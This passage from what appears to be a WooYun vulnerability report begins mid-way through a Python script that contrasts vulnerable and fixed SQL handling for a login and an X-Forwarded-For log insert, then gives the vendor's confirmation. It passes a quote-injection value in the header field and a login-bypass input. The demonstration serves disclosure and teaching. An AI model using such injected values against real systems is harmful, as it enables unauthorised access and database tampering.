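    print("fixed login accepts bypass:     ", login_fixed(db, "20003441", bypass))
    print("vulnerable XFF insert runs:     ", insert_succeeds(log_visit_vulnerable, db, "127.0.0.1'"))
    print("fixed XFF insert runs:          ", insert_succeeds(log_visit_fixed, db, "127.0.0.1'"))
```

Note that the fixed login still compares a plaintext password only to keep the contrast minimal; a real system stores a salted password hash and checks it with a constant-time comparison.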

Proof of vulnerability:


Fix recommendation:

Copyright notice: please credit _Thorns@WooYun when reposting


Vulnerability response

Vendor response:

Severity: high

Vulnerability Rank: 10

Confirmed: 2015-11-09 18:54

Vendor reply:

Confirmed, thank you.

Latest status:

None yet